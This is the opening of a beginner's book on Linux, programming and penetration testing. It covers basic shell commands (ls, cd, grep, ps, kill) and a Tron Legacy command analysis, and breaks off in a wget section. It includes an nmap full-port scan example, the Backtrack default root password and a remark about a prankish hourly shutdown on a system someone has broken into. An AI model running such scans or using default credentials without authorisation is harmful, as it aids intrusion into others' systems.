Linux, Programming and Hacking For Beginners - J. J. Kane

www.fullengineeringbook.
net
Linux, Programming and Hacking for
Beginners
By J.J. Kane
www.fullengineeringbook.net
Linux, Programming and Hacking for Beginners
Copyright © 2016 by James Piggott
ALL RIGHTS RESERVED.
First Edition November 2016

Kindle Edition.
ASIN: B01N0CF3L5
Published by SciFiEmpire.net Publishing
This book contains some references to fiction. Names, characters, places and
incidents are either the product of the author’s imagination or are used
fictitiously, and any resemblance to any actual persons, living or dead, events,
or locales is entirely coincidental. The publisher does not have any control
over and does not assume any responsibility for author or third-party websites
or their content.
Special Thanks
To the readers of HackForums.net, Tweakers.net and StackOverflow.com for
their contributions. Their efforts to answer my questions, debug my code and
fact check everything I wrote was invaluable and made writing this textbook a
learning experience in itself.
Amsterdam, May, 2016.
About the Author
J.J. Kane holds a master’s degree in Computer Science. During his college
years he frequently worked as a Teaching Assistant for courses on
Programming, Managing Big Data, Data Science and Machine Learning. Since
then he has worked as Data Scientist for consulting company Cap Gemini and
for KLM on detecting passenger behavior through Machine Learning. He has
also worked as a Software Engineer for the E-Balance project that aims to
create an electricity balancing application. In his spare time, he enjoys writing
science-fiction, blog about science-fiction, play and create computer games
and write tutorials for all sorts of obscure Computer Science topics.
So how did this textbook get started?
First learning how to use Linux and its command line is not easy. Neither is
programming or Penetration testing, also known as hacking. To a lot of
beginners, it feels like it is something you either know don’t know and what is
worse is that you probably have no idea how to learn any of it. For me it took
the better part of a decade to start to feel comfortable with Linux and
Programming. Even then I used knowledge of both separately. Only together,
and with Penetration testing added can you really survive the modern academic
and professional workplace.
So why did I decide to write this book. After giving advice and tips on Linux
for years I decided to write my advice up into short tutorials. I became the
GOTO guy, or a walking reference on Linux and its command line. Eventually
the idea fermented to write a book on Linux and Programming, which you are
going delve into shortly. As this book originates from teaching students and
workplace professionals it was not written from an academic point of view.
Yet the tutorials I originally wrote attempted to address academic deficiencies
I encountered among students. I wanted to write an easy to understand text that
resembled a primer, but was more involved. I wanted readers to experience
Linux and Programming thoroughly so the knowledge would stick and they
would have a solid foundation to use both whenever they needed. I added the
third part of the book, on Penetration Testing to complete the cycle. I hope
readers will thus find it an easy and yet comprehensive introduction to Linux,
Programming and Hacking!”
Who is this book for?
Linux, Programming and Hacking for Beginners is an introductory book for
readers keen to quickly learn more about each of these three topics. After
reading the book and going through the examples readers will have acquired
more than just a rudimentary knowledge of each topic. This knowledge can
potentially be applied for further education, on a job or to further their
knowledge discovery. The first part of the book, on Linux, focuses on teaching
basic Linux commands. The second part focuses on programming. Basic
syntax, algorithms and best practices are explained using several programming
languages such as C, Java, Perl and Python while minor coding examples in
half a dozen other languages are also detailed. The final part of the book, on
hacking, gives an overview of how to perform penetration testing to test a
system for vulnerabilities. Again the best practices are illustrated using
examples. At the end of the text the reader may not be an expert in any of these
three fields, but the knowledge collates together as a critical mass readers can
use to better judge their next step in exploring the field of Computers and
Computer Science.
How This Book Is Structured?

As mentioned this book is set up in three parts. Each part consists of about a
half dozen chapters. The chapters are self-contained thus allowing readers to
use this text as a quick reference guide after they have read it. After each
chapter I have usually include a short chapter that details something off-topic
that I think may be cool to know. Sometimes I discuss how hacking and
programming is done (in)-correctly in popular culture while on other
occasions I discuss other more scientific topics. These extra chapters are
intended to be fun and do not form the core of this textbook, but I hope you will
appreciate them nonetheless. Please note any screenshots I made from movies,
games and other literature is fair-use and no copyright infringement was
intended.
Conventions Used in This Book

This book is a practical guide to Linux, programming and Pen testing. Topics
are illustrated through examples that the reader could, and should carry out.
That means typing in commands and code. To not confuse the reader this text
adheres to certain conventions.
The first conventions are regarding Linux commands. In the text they are
marked with bold. Each bold set of words is version of a command. For
example, under the section uname in chapter 0 there are several alternative
commands described such as uname –a and man uname. The reader can type
these commands into the commands terminal if they want, but the full command
sequences with optional switches (also explained in chapter 0) is described
below. Readers who open a terminal in Ubuntu will see the following text
appear.
username@ubuntu:~$
The commands in this text can be entered after the dollar sign.
username@ubuntu:~$ uname –a
Alternatively, users of Linux could see the sharp ‘#’ character instead of the
dollar sign ‘$’. These users have root access to their system and are allowed
to enter any command. For the most important commands in this text I have also
provided screenshots to illustrate their effects.
During part 2 of this text programming is explained. The reader can copy
program directly from the text by using the Control-C (copy) and Control-V
(paste) hotkeys or they can type in the programs. If you do the latter, you will
quickly develop those muscle memories needed for programming. Program
code is styled differently from Linux commands and the surrounding text. The
Font has been changed to Courier and the code is indented. Various parts of the
code are color coordinated. This is syntax highlighting and is provided by
some text editors. It adds no functionality but it does make the code readily as
your programs grown in size. Below is some pseudo code to illustrate this.
Begin program
Print out text “Hello, world!”
Ask for text input
If input is equal to “Hello to you as well”
Then print out text “Goodbye” for 5 times
Return
End Program
The pseudo code I wrote is mostly nonsense, there is no computer programmed

to understand it. However, it does resemble the way programs are written. Let
it give you a feel for the logic that underlies programs. After you have typed
the code into a text file with the correct ending befitting that programming
languages you still have to command the operating system to execute it. These
steps are essentially Linux commands. By the time you get to part 2 of this
book you will be a pro when it comes to commands. Nonetheless, the
necessary commands to execute each program are provided.
The final part of the book, on Penetration testing, does not introduce any major
conventions. All actions are commands to be entered into the Terminal. If a
command has a component written in italics then the reader may enter their
options, depending on the rules written in the text. An example is illustrated
below.
root@kali:~# nmap -sT -p- -PN IP-address
Here the port scanner application nmap is run. Various options have been
added but the user may enter an IP address of their own choosing as the
intended target. Just be sure to have permission from the owner of the target
computer to perform the scan.
Digital Content & Source Code

Readers can download the program code directly from this website. Provide
link to GitHub account.
Please use the issue functionality to communicate any bugs, typos and
questions.
Table of Contents
Part 1. Linux and the Command Line
Chapter 0. Introduction to Linux - 11.
Chapter 1. The Basics - 19.
Chapter 2. Linux File Operations - 35.
Chapter 3. Advanced Linux Commands - 49.
Chapter 4. Text Editors and Desktop Environments -
62.
Part 2. Programming
Chapter 1. Beginning Programming with Python - 77.
Chapter 2. Shell scripting and using Shell as a
programming language - 83.
Chapter 3. C memory management and pointer
variables - 93.
Chapter 4. Object-oriented design with Java - 101.
Chapter 5. Algorithms with Perl - 114.
Part 3: Hacking
Chapter 0. On Hacking - 123.
Chapter 1. Reconnaissance - 126.
Chapter 2. Scanning - 136.
Chapter 3. Exploitation - 144.
Chapter 4. Wireless hacking - 149.
Chapter 5. Path Traversal - 153.
Chapter 6. SQL Injection - 156.
Chapter 7. Cross Site Scripting - 162.
Extra articles
Analysis of commands used in Tron Legacy - 29
The Matrix Series and a CMD Tutorial - 43
Hackers and some PowerShell - 56
Git and GitHub tutorial - 68
Swift – Apple’s hot new programming language - 89
FORTRAN – the old one that doesn’t want to die – 99
A brief history of programming languages - 107
Make – compile your code the easy way - 119
The Net – how not to hack - 132
Sneakers – besides the digital realm - 142
Mr. Robot – the new era of surveillance - 152
Neuromancer + other popular culture - 161
WarGames – nostalgia for BASIC - 165
Part 1. Linux and the command line
Chapter 0 Introduction to Linux
What is Linux?
Linux was developed by Linus Torvalds during the early 1990’s as an
Operating System that wouldn’t be bound to the restrictive licensing imposed
by other so-called Open-Source systems based on UNIX. Linux refers to the
kernel used by operating systems such Ubuntu, Kali, Mint and many others. The
applications that come with the Linux operating system are part of GNU (which
stands for GNU’s Not UNIX!). The GNU project provides source code
compilers, Desktop environments, text editors and many other applications for
Open-Sourced software. A Linux Kernel and any software from GNU can be
used to create a new Linux OS, also known as a distro (distribution). So far
several hundred Linux distros are in use. The Linux kernel and the GNU
packages taken together truly form Linux and they are less frequently referred
to as GNU/Linux.
Interfaces
Linux comes with two types of interfaces for users. The Desktop environment
or Graphical User Interface (GUI) is the one you are probably familiar with.
You can use your mouse to click on icons to start applications or navigate
through a directory. Linux GUI is based on the X Window System (X11) which
runs a server X.Org that maintains the desktop environment. Windows uses the
Desktop Window Manager in a similar fashion.
However, the true strength of Linux comes from the use of the Command Line
Interface (CLI). Proper use of the CLI allows users to quickly run tasks in
succession and perform searches, maintenance and development that wouldn’t
be possible with the GUI. If you bought this book than you expect to learn more
about the CLI to do just that.
Why use the CLI at all?
Chances are you’re unhappy abandoning the GUI. Perhaps you have been a
lifelong user of Windows who considers the command line or CMD to be a
thing of the past. You may be thinking that ‘if you can’t open a program without
double-clicking on an icon it is not working properly’. Windows does indeed
offer a slick interface (especially Windows 7 and 10, not counting 8). It is
responsive and good looking. In comparison the interface of Ubuntu, called
Unity, is a bit of a disaster. The hideous launcher on the left and the task bar at
the top seem to have been developed to make life more difficult. There are
alternatives. Kali Linux used for Penetration Testing and Linux Mint are two
examples with interfaces that can be customized to appear similar to Windows.
Nonetheless, clicking on icons in Linux often feels sluggish. It is time to
unleash the power of the Command Line Interface!
A CLI is a pure text terminal similar to CMD on Windows which accepts only
text arguments. Ubuntu and other Linux versions using the GNOME
environment (including Kali and Mint) use the Terminal. You can find the
Terminal in Ubuntu by searching for it after clicking the top most icon on the
launcher. With the Terminal you can execute commands and programs, add
additional options to them and even chain commands together to instantly
perform difficult tasks.
Figure 1 Ubuntu GUI with one Terminal open
Most Linux distro’s come installed with Bash, or Bourne Again Shell, which is
both a shell and a command language that communicates with the operating
system. It essentially interprets what the user writes in Terminal. The overview
below shows the relation between a Linux System, the GUI on the right and the
CLI on the left.
Figure 2 the command line as an alternative to the GUI
Superuser
Not everybody on Linux can perform every task. Only an administrator with
Root access can perform potentially adverse system commands. On most Linux
distro’s the first user is ordinarily the Superuser with root access. Ubuntu is
unique in that it prevents users from making mistakes by denying them access to
root by default. In the command line you can type the following command to
change this.
username@ubuntu:~$sudo su
After which you will be prompted for the password you inputted when you
installed Linux. A correct password will see the sign $ replaced with #. You
now have Superuser status. Users of other Linux distro’s such as Kali have by
default this status. You can revert to a regular user by typing in exit.
Basic system commands
We start with two simple commands; whoami and uname. As you may guess
they reveal the username and other information, which can be handy if you are
using a Linux system but are not familiar with the flavor.
whoami
Typing the command whoami in the terminal will return the username of the
present user. If you’re using the system as the root user the Terminal will print
root. However, most Linux commands have a selection of options called
switches that can be added. To find out what these switches are for whoami
you type in man whoami in the command line. The manual for the command
whoami is then printed in the terminal. To return to the Terminal just press q
for quit. But if you stick around and use the PgUp and PgDown keys you can
navigate through the manual and discover that whoami has two possible
switches that can be added. whoami --help shows a brief guide and informs
users where they can report possible bugs. whoami --version shows that the
command is actually a little program written by Richard Mlynarik and that it is
protected by the GNU GPL version 3 copyright allowing free distribution and
alteration.
Figure 3 whoami command examples
uname
With the command uname you can discover what operating system you are
running. At least that is what the vanilla command returns. If you look at man
uname you see there are about a dozen switches that return information like the
Linux kernel you are running, the processor of your system and the hardware
platform. The command uname –a prints everything. Let’s analyze what
uname –a returns.
username@ubuntu:~$ uname –a
My output is as follows.
Linux ubuntu 4.2.0-18-generic #22-Ubuntu SMP Fri Nov 6 18:25:50 UTC

2015 x86_64 x86_64 x86_64 GNU/Linux
This tells us that my computer’s name is ubuntu. Linux ubuntu 4.2.0-18-

generic tells us that the current OS implementation uses version 4.2 of the
Linux kernel and that it runs a 64 bit version of the OS.
The Linux file system
Everything in Linux is a file, including system configuration settings. So it is
important to use the CLI to get the lay of the land. You may have already
clicked through the file system of your Linux OS and discovered maps named
/sbin, /var, /usr, /bin and a slew of others. There is method to this madness.
Below is a graph with the basic file structure of a Linux distribution. At the top
is root or /. You cannot navigate any further back.
The root file contains all the system sub-directories. Most are of no interest for
regular Linux use. However, folders containing acronyms such as bin, sbin are.
Bin stands for binaries and these are files you can execute. There are four
folders with bin in their names that are of interest
/bin - contains trivial commands used in the early boot stage. Examples
include ls (list files) and cat (display and alter file contents) which are
used for everyday tasks.
/sbin - contains binaries of commands used only by the superuser.
Examples include reboot, poweroff, shutdown and many more.
/usr/bin - primary directory for executable commands.
/usr/sbin - contains programs not under direct control of the user
/usr/local/bin – this folder can be used by the user to store scripts and
install binaries.
We can easily use the command line to navigate to these folders and see for
ourselves what they contain. For that we will use commands such as pwd, ls
and cd which are the topic of the next paragraph.
Directory Operations
The following commands such as ls, pwd and cd, can be used to see what files
and folder are located in a directory. The final command explained in this
chapter is tree, which may not be installed on your system, but the command to
install it is!
ls
This command will list all the files and folders that are contained in the folder
that you have navigated to. If you add the switch -l (l of laughter) you will see
a detailed list with file permissions and file sizes. Thus the most common
variant of the list command is ls –l. The columns have the following meaning.
The first deals with the file permissions, it shows what rights a root user,
group users or guests’ users have. 4096 means files sizes in 4096 bytes. And
the last column states the date of creation or last alteration. With the switch –a
users can view hidden files.
Figure 4 using the list command (ls -l -a)
pwd
The command pwd prints your present location in the file directory to the
command line. It is excellent for finding your way.
username@ubuntu:~$ pwd
If you open a Terminal and use pwd you should see /home as output, /root on
other distro’s.
cd
The command cd stands for change directory allows the user to move through
the folders of a directory without the use of their mouse. In Linux you start out
in the root folder or home folder when you open a terminal. If you were to right
click on a file in Desktop (note the upper case) you find under location the
folder directory: /home/username/Desktop.
To open a file in Desktop with the Terminal you can either type in the entire
directory plus the filename every time you access it or you can move to the
folder with the following command.
username@ubuntu:~$ cd Desktop/
Note that the forward slashes are essential. If you want to move to a folder
located in a different part of the file system you must add a forward slash. To
move all the way back from where you started just type in cd. This will take
you back to the root (home) folder. If you want to move back one branch of the
directory use cd ..
username@ubuntu:~$ cd ..
Note there is a space between cd and the two dots ..
Figure 5 examples of using change directory
tree
The command list is a fine command if you want to view the contents of a
folder, but if you don't exactly know the layout of your folder structure or don't
know where you stored a file than using the mouse to browse and visually
search through all the maps will be faster than using the list command. Yet, it
would still be tedious. Instead try the tree command.
username@ubuntu:~$ tree
Chances are you will just see the disappointing message that the command was
not found. Tree is a program that is not installed on every Linux distro. Ubuntu
may have it but many others do not. Don't despair. Just type in the following to
install tree.
username@ubuntu:~$ sudo apt-get install tree
By using tree you can get an overview of all the files and subfolder of a folder.
If there are too many use the switch –d to view just folders (d for directory).
Use man tree to view the long list of other possible switches.
Repositories
With apt-get the user is accessing remote repos with the Advanced Packaging
Tool or APT. It allows users to retrieve and update software packages. Up
until the late 90’s Linux was distributed on CD-ROM, but as the operating
system became more popular it was becoming problematic to include every
piece of software that may be used.
Using online repositories was the answer. The Debian flavor of Linux uses
dpkg to download binaries packages (.DEB). However, dpkg is very low-
level and outside our scope. A replacement for Debian is aptitude with its apt-
get command. Aptitude acts as a front-end to dpkg. Yet on systems such as
Ubuntu users can also use graphical interfaces to install software (Ubuntu
Software Center).
In contrast to dpkg there is also rpm, originally from Red Hat Linux with its
Yum front-end. Fedora is an operating system that uses Yum, another is Red Hat
Enterprise Linux of which CentOS is a popular flavor.
Chapter 1. The Basics
This chapter will show you the Terminal commands that will allow you to find
your way around a Linux Operating system. Chances are that over 50% of all
the commands you will ever type are those that are described in this chapter.
Knowing these well ensures you can learn other advanced commands and
switches with greater ease.
This chapter starts with folder operations: it shows the reader how to create
and remove folders, how to copy files and how to find files on your system.
The second paragraph discusses process operations: how to find running
processes and discontinue those processes. The final paragraph describes
commands for common tasks such as rebooting your system, clearing your
Terminal screen and, if necessary, start the GUI of your operating system if it
won’t start on its own.
Folder Operations
Now that you can list all the files in a folder and even view the entire folder
structure of your system it is time to perform basic folder tasks without the aid
of a mouse. Be careful with the command rm (remove) if you do not intend to
remove files and folders you may need later on. Use the command tree to view
all files in any subfolder before using remove.
mkdir
You can easily make folders in Linux to store your files in an orderly fashion.
The mkdir command or make directory allows you to create a new directory
(folder) in the folder you have presently navigated to. An example of the mkdir
command will create a folder called testfile inside the root (home) directory.
username@ubuntu:~$ mkdir testfile
If the folder already exists you will get an error message saying “cannot
create folder, folder already exists”. For example if I start the terminal I am
located by default in the home (root) folder, if I were to try and create a folder
called Desktop I discover that it already exists.
username@ubuntu:~$ mkdir Desktop
Don’t forget that Linux is case sensitive, so if I were to type in the command
mkdir desktop a new directory called desktop will be created alongside the
already existing Desktop folder.
Figure 6. An example run of the mkdir command

The mkdir command is easy to use and allows users to store files in an
organized manner. I suggest readers make ample use of it.
rm
With the command rm you can remove files and folders, at least if you have
permission to do so. To perform the command simply type in rm filename.
However, the command is insufficient to remove folders. To remove folders
add the switch ‘–r’. For example, I created a new folder called testfile in my
home (root) directory. I can only delete it with rm –r testfile. Be sure that you
really want to remove a folder, because all of its contents will also be deleted.
username@ubuntu:~$ rm –r testfile
The switch –r stands for recursion. This means rm will check the folder and all
of its subfolders until it reaches the bottom. It will then delete the files in that
folder, go up one folder location and the delete the now empty sub folder. This
process continues until all content of a folder and the folder itself are deleted.
Figure 7. The RM command detailed
Be careful with the command rm –r. It DELETE a specified folder and its
contents no matter what!
cp
The command cp stands for copy. It allows you to copy files from one folder to
another. Below is an example of the use of cp. The first part of the command
determines the location of the file we want to copy. In this case the file is
located in /home/user/Downloads. This part is followed by the name and
extension of the file we want to copy (test.txt). The last part of the command
determines the location of where the file is to be copied to (/root/Desktop).
username@ubuntu:~$ cp /home/user/Downloads/test.txt
/home/user/Desktop
If I am already located in the directory to which I want to copy the file or
folder just type in a dot ‘.’. By extension if you want to copy the entire contents
of a folder use the wildcard * instead of the filename.
username@ubuntu:~$ cp /home/user/Downloads/*
/home/user/Desktop
The above example uses the wildcard to copy ALL files in the folder
Downloads to the folder Desktop.
Figure 8. Variations of the CP command
In the screenshot above I demonstrate two methods of using cp. In the first I use
the full folder location of both source and destination location. In the second I
use just a dot ‘.’ For the destination after I have navigated to the folder
Desktop. Note that I also made mistakes. First I tried to auto-complete the
source destination but Ubuntu reminded me there are three sub-folders in that
directory starting with capital D. Below that I failed to enter the destination
folder and thus the command was not carried out.
mv
With mv (move) a file can be cut to a new directory. It is similar to dragging a
file or folder or using the ‘cut and paste’ option in that once the file is copied
to the new location it is deleted from the old location.
username@ubuntu:~$ mv /home/user/Downloads/*
/home/user/Desktop
Other than that mv is similar to cp. You can again use the wildcard to move
more than one file or folder at a time.
grep
The grep command allows you to find files that contain a specific string of
text. It is thus similar to the Windows function ‘Search programs and files’. As
traversing manually through the folder of a Linux operating system is tedious it
would be helpful if we knew where to look for a specified file containing the
text we are looking for.
username@ubuntu:~$ grep “world” world.txt
In this example we look for the string world in the file world.txt. You can
specify if you want to look through just one file or through all the files found in
the folder and subfolder. As you may have surmised from the previous
command you can again use the wildcard * expression.
Grep is very multifunctional. It can easily be combined with other commands

and chained together to perform some very complicated tasks. Users also need
to remember that Linux is case sensitive. If all instances of ‘world’ start with a
capital W the grep command above won’t find any. The –i switch makes grep
case insensitive.
username@ubuntu:~$ grep -i “world” world.txt
As I mentioned grep can be used on conjunction with other commands. An

example would be the ls command.
username@ubuntu:~$ ls | grep ‘world’
In the above example ls is executed first and its output is fed into the grep
command through the use of the vertical bar ‘|’ called a pipe. Pipes will be
explained in detail in chapter 3, but it will be used sparingly before that.
Grep also has the option to look for a partial word match. By encasing the
sequence we are looking for with the wildcard * we state that we find it ok if
the word is preceded and succeeded by any character sequence imaginable.
username@ubuntu:~$ ls | grep -i *orl*
The example above searches for any case insensitive sequences of the
characters ‘orl’ within a word within the list of files within that particular
folder. In this case the output would return a list of just one file.
Figure 9. LS combined with regular expressions
Grep stands for global regular expression print and it makes use of regular
expression to evaluate what tasks it should perform. Regular expressions are a
standard that define the sequence of characters in a text that need to be
operated on. With grep we search for a number of characters matching a
pattern. Regular expressions will be discussed in detail in a later chapter.
Process Operations
If you find yourself in difficulty with having started an unwanted program or if
one is using up too much memory you may want to discontinue it. The
commands ps and kill can help.
ps
With the ps command a list of all currently running processes is printed onto
the terminal. The command is very useful in gauging the current resource usage
and see what programs are hogging all the memory and CPU cycles. Use the
switch –ef to generate a list of all processes currently running without
overflowing you with information as –l would[1].
username@ubuntu:~$ ps -ef
The command can also be combined with grep. If you want to find a particular
process but you can’t find it you can use the pipe | followed by grep
stringtosearchfor. The latter stands for the string that you think the process
may be called after. An example to find bash is
username@ubuntu:~$ ps –ef | grep bash
Figure 10. PS combined with regular expressions
top
A simple command that will show all processes, even those not running, is top.
With top you may well end up with a very lengthy list of processes, but at the
top of the output there is plenty of information to determine what your system is
doing.
username@ubuntu:~$ top
To end top press C-c (Control-c).
Figure 11. example output from running Top
kill
With the command kill you can end any process. You will have to know its
number, which you can find with ps. The kill command is considered
somewhat overkill. The switch -9 guarantees the process will be terminated.
username@ubuntu:~$ kill -9 processnumber
As an example open a second terminal window and run the top command. With
ps you can easily search for the top process as follows
username@ubuntu:~$ ps -ef | grep top

In the second column of the output entitled PID there are numbers next to the
processes that were running. With these numbers you can kill a process. As an
example, top has number 5414 when I ran it. So the kill command would be
executed as follows
username@ubuntu:~$ kill -9 5414
Figure 12. The kill command with the -9 switch
Basic household tasks
The final six commands discussed in this chapter are used for regular
household chores you can do with the command line. The commands allow you
to start a Graphical User Interface of the operating system if it hasn’t started
yet, reboot your computer or shut it down for a cold reboot as well clear a
Terminal from your commands and output.
startx
The command startx is a shell script that starts the X Window System so you
can have Graphical User Interface to work with if you want. Before there was
Kali Linux for penetration testers there was Backtrack which by default did not
start the GUI. After typing in username as ‘root’ and password ‘toor’ you had
only a Command Line Interface (CLI). The ‘startx’ command started the GUI if
you did not feel comfortable to work with just a CLI. A stripped down version
of Linux operating systems used with embedded systems often use just a CLI
with a command toolset such as BusyBox.
reboot
After making changes to the software of an OS you usually reboot the system,
or it asks you to. You can also do this from the terminal with the simple
command reboot. As there are many Linux flavors that do not have a GUI it is
vital to know this and the next command shutdown. Also if you screw up your
OS and you think a reboot would fix whatever you did wrong than this
command is a life saver. There is no great mystery here, just type in reboot.
username@ubuntu:~$ reboot
shutdown
Just like reboot there is also a command to simply switch off your computer
and that is shutdown. Just as with reboot the GUI actually carries out a similar
command when you click on the button shutdown. Just like reboot the command
will come in handy when you do not have a GUI at your disposal. Both
commands can also be used somewhat nefariously by those that gain entry to
other people system. Think of a program that orders the system to be shut down
every hour or so just for laughs.
username@ubuntu:~$ shutdown
history
Another useful tool is the command history which will print all the commands
you have entered in this chapter as output in the Terminal. It is useful to check
what you have done without seeing the output of previous commands, it just
prints the commands. History has many possible switches, but they are
intended for more advanced Linux users and are outside the scope of text.
Have a look at the manual to see examples of possible switches.
username@ubuntu:~$ history
You can the view the log commands with history even after you have rebooted
the system.
Figure 13. history shows the latest commands used
clear
To clear the Terminal of all commands and command output just type in clear
and you get a crisp clean Terminal as though you had just started one. You can
still use history to view all your previous commands. Viewing the manual for
clear reveals it has no switches
username@ubuntu:~$ clear
A second option to clear the Terminal is by holding down the Control-L button
(Clear). Such Terminal hotkeys will be explained in greater detail in chapter 4.
exit
To end a Terminal window just type in exit. Viewing the manual for exit
reveals it also has no switches.
username@ubuntu:~$ exit
Summary Chapter 1
This chapter introduced a number of commands around basic themes such as
file operations, process operations and basic household tasks. At first there
may not seem to be much gain by performing file operations with the Terminal
compared to using a mouse. However, if you are serious about learning more
about Linux than you stand a good chance to be confronted with an
implementation that has no GUI or where you are required to use the command
line to communicate with another Linux machine through a service such as
SSH. If you want to copy files to and from other systems you will have to use
cp, rm and grep.
For the same reason it is important to learn other commands such as ps to
search processes and kill to end them. Startx, reboot and shutdown allow you
to perform actions to get out of trouble as it is often unwise to pull the plug on
a Linux system for fear of ruining its filesystem. I thought it prudent to learn
these commands before tackling more difficult ones in the upcoming chapters.
With history and clear you manipulate the output of the Terminal to make sure
you can still see the woods through the trees.
A word of note, using the up and down arrows allow you to re-select previous
commands. I also briefly showed you how to combine commands. Note the
pipe | between the ps and grep commands. With it we piped output from the
command on the left into the one on the right. Finally with the command exit
you learned how to neatly close a Terminal window.
Don’t worry if the list of commands seems overwhelming. I picked this list
because they are the most frequently used and are often used in conjunction
with each other. Some commands such startx, reboot and shutdown are
exceptions and most of the time the commands will be executed with the use of
a mouse. Yet, I consider them necessary for when you are in difficulty.
Now onto less meaty stuff with the first EXTRA chapter of this book!
.
Figure 14. Olivia Wilde as Quorra
EXTRA:
Tron Legacy command line:
Explained
Reading endless chapters about Linux, commands and programming concepts
can quickly become tiresome. I find it can quickly cause skepticism leaving a
reader to question what they are learning is really helpful. A long time ago I
read a book on the Java programming language called Just Java, by Peter van
der Linden. The book was written in somewhat daunting prose, but at the end
of every chapter he would include a paragraph on a light-hearted topic.
Sometimes it would have little to do with programming. In this book I do the
same thing. My goal for writing this book is too quickly pull away the veil
around Linux, Programming and Hacking.
So I decided to show you how each is done in popular culture.
Software engineers and hackers have an affinity with movies, games and
novels about science-fiction, spy craft and thrillers. Nearly each chapter has a
concluding part that clarifies how Hollywood gets it right or wrong. A few
other chapters will have short articles on a technical topic. They may not be
necessary to understand what is written in this book but they are interesting and
helpful to know. To conclude the first chapter an analysis is made of the 2010
movie Tron Legacy from director Joseph Kosinsksi.
Figure 15. Garret Hedlund as Sam Flynn
You all know the setting!
Grumpy middle-aged man gets out of prison and decides to perform one last
heist. He enlists the help of a crack team of hackers, lock pickers and
scammers to get the job done. When the hackers try to get into the impossibly
secure system they, illogically, use a GUI hacking tool. I suppose Hollywood
thinks it is necessary to hide as much of tech stuff so as not to confuse the
audience. As you may already know, such tools in real live either don’t exist or
are a watered down version intended for script kiddies who can’t work with
an actual command line. Not so in Tron Legacy! Granted, it’s not a heist movie
but the creative staff at least took the effort to make the use of computers look
as authentic as possible.
Tron legacy is the sequel to the 1982 cult-classic Tron that starred Jeff Bridges
as wiz programmer Kevin Flynn and Bruce Boxleitner as his co-worker Alan
Bradley. It was directed by Steven Lisberger. Both actors have returned for the
sequel but it is Garrett Hedlund that takes the lead as Sam Flynn as he tries to
uncover what happened to his father after his disappearance in 1989. Only
Alan suspects that Kevin entered the computer world as he did in the first
movie. At his father’s arcade Sam finds his father’s computer connected to the
laser that allows him access into the digital world called the GRID.
Figure 16. Sam uploading a script
So how are computers used on TRON Legacy?
The movie opens with a scene in which Sam tries steal to the new operating
system from ENCOM, his father’s company, of which he is majority
shareholder. As the hack progresses Alan Bradley informs the board their OS
is on the internet. Cillian Murphy's character Edward Dillinger, Jr. (a reference
to the first movie protagonist) tries to stop the hack. Below I will discuss with
screenshots taken from the movie what actions he performs. With your limited
knowledge of the Linux CLI from just one chapter a lot should look familiar.
Figure 17. Cillian Murphy as Edward Dillinger Jr.
Dillinger has just typed in the following series of commands on one line with
root (#) access.
# ps –ef | grep –i os12
The first part ‘ps –ef’ lists all processes. With the pipe ‘|’ it is fed as an
argument to the command on the right. ‘grep –i os12’ will find all processes
that include string ‘os12’ in its name. OS12 is the name of the operating system
Sam is trying to steal. So now Dillinger has found two such processes. One
with number 17319 is the hack started by Sam while 18458 is the command
Dillinger started.
Figure 18 Dillinger uses PS and Grep

In the next screenshot Dillinger ends the hack by inputting into the command
line.
# kill -9 17319
The switch -9 ensures ‘execution’.
Figure 19. Dillinger kills the hack
Figure 20. Sam uses the touchscreen interface

Later on in the movie!
At Kevin Flynn’s arcade Sam attempts to figure out why Alan received a page
that used a number disconnected for 20 years. Sam starts off carefully. With
commands such as whoami and uname –a he tries to understand the basics of
the system. With the command ‘history’ Sam Flynn tries to uncover the last
thing that his father did on this particular machine before he disappeared.
Figure 21. Using the History command

As you can see the command on line 488 was a change directory while 489
opened the LLSDLaserControl.c with the text editor vi, changes were made to
the program but that is not evident from the command line history. On line 490
and 491 Kevin Flynn used the utility tool Make to compile all the code and turn
them into executable files. One line 492 he runs the program sanity_check, on
line 493 he runs configure, but makes alterations to it with vi on line 494.
Finally on line 495 he again uses vi to edit a file called
last_will_and_testament.txt.
The command ‘ps’ on line 497 gives a snapshot of the current processes. The
switches –a –x –u declare that all processes in the terminal including those of
other users should be shown. Lines 498 and 499 show examples of the kill
command whereby processes are discontinued by the user. On line 500 the ‘ps’
command is once again run before Kevin Flynn updates the timestamps of all
files in the folder /opt/LLL/run/ok. Finally on line 501 program
LLSDLaserControl with the switches –ok 1 is run which allow Kevin to be
transported onto the GRID.
In the screenshot above there are also two other windows opens. The top one
shows all running process such as Xorg and init while the bottom window
reveals the operating system to be Sun Solaris (now run by Oracle) on an x86
system. Officially the first version of Sun Solaris wasn’t released until 1992,
though development had commenced 5 years before. Astute readers may
remember that Linux wasn’t released until 1991. Most commands discussed in
this book so far are POSIX-compliant. This means they have implementations
in other operating systems as well and use a common command interface. As
such you can use commands such as grep, ps and history on many other systems
such Mac OS X, Berkeley Software Distribution (FreeBSD, NetBSD and
OpenBSD), AIX and HP-UX.
Although not many people know this the title TRON refers to the program Alan
Bradley wrote in the first movie. Tron allowed for unscheduled process
activity to be shut down and safeguard computer systems from a takeover. In
the old dialects of BASIC the command you used to debug was TRON[2] (an
abbreviation of ‘TRace ON’). The command printed out the line number that
the computer executed at that moment which allowed software engineers to
trace events as they unfolded. The command TRON had an opposite with
TROFF or ‘Trace OFF’ which would switch off tracing. Most modern versions
of BASIC such as Microsoft Visual BASIC no longer support TRON[3].
I hope you had fun reading this little excursion and don’t forget to check out
TRON and TRON Legacy!
Chapter 2 Linux file operations
In this chapter I will discuss how a Linux user can perform file operations.
This includes downloading files and programs, extract (unzip) files and run
programs from the command line. For many users this is where Linux shows its
main weakness compared to operating systems such as Windows and OS X.
Often Linux downloads are offered in formats such as .tar, .bz, .gz and
variations. Without knowing how to extract a file it is impossible to know
which to download. Even if you manage to unzip a file you cannot double click
on a program to run it. At least, not always, though some distro do aid the user
in trying. Only those programs that are installed through the Ubuntu Software
Center have a nice clickable icon, but most open source programs lack those.
Whereas the previous chapter gained you knowledge on how to find your way
through the Linux file system without using a GUI this chapter completes the
circle and teaches you to use Linux to run programs.
Downloading Linux programs
wget
wget is short for World Wide Web get which gives users an indication as to its
purpose. Officially the tool’s purpose is labeled as retrieving content from
web servers. Of course that could mean anything; in fact wget allows you to
download individual files should you know their full URL or you can
download the content of an entire website, or just a part. An example of
downloading only the front page of a website would be
username@ubuntu:~$ wget http://www.example.com/
To download a file it is normally easier to use a browser such a Firefox or
Chrome. The file, should it contain a program, should be for Linux use only
and probably has the extension .tar.gz or derivatives thereof (and there are
many as mentioned). However, if you can only use the command line because
there is no GUI or there is are verification steps and you have the exact URL
